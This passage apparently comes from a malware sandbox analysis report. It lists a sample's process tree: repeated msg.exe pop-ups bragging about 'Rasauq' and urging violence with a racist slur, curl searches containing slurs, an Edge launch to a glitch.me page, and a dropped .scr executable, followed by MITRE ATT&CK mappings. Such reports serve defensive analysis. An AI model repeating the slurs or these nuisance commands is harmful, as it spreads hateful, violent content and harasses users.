      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7784
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5048
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8120
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7284
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7284
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8376
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8408
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8496
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8992
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9012
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7196
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8236
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7940
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8380
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8548
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8876
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8896
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:9016
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8212
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:9072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8388
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8476
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8524
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8948
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8936
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:9036
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:9060
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:9084
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8540
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9124

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4848

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3632

C:\Users\Admin\AppData\Local\Windows Host Service.scr
"C:\Users\Admin\AppData\Local\Windows Host Service.scr"
1⤵
- Executes dropped EXE
PID:7276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery